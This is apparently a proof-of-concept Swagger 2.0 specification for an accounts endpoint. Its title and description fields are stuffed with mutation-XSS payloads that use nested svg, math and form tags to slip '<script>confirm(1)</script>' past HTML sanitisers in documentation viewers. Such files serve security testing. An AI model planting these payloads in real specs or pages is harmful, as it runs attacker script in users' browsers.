swagger: '2.0'
info:
  title: TESTED<svg><!--?php "--><script>confirm(1)</script>?&gt;</svg>
  description: |
       <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>"><svg><!--?php "--><script>confirm(1)</script>?&gt;</svg><svg><!--?php "--><script>confirm(1)</script>?&gt;</svg> src=1>"></form>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        0: 
      operationId: findAccounts
      summary: [Client account information]
